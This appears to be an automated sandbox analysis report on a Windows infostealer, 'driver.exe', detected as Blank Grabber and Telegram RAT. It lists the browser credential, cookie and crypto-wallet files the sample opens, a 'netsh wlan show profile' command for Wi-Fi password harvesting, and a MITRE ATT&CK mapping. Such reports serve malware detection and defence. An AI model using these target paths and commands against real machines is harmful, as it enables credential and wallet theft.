Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\driver.exe

Code function: 0_2_00007FF6A29BD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6A29BD080

Source: C:\Users\user\Desktop\driver.exe

Code function: 0_2_00007FF6A29D5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6A29D5C70

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF7542848CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

77_2_00007FF7542848CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driver.exe PID: 5708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fJaxx
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driver.exe PID: 5708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	4 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	21 Obfuscated Files or Information	Security Account Manager	59 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	161 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
driver.exe	44%	Virustotal		Browse
driver.exe	37%	ReversingLabs	Win32.Exploit.BlankGrabber

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
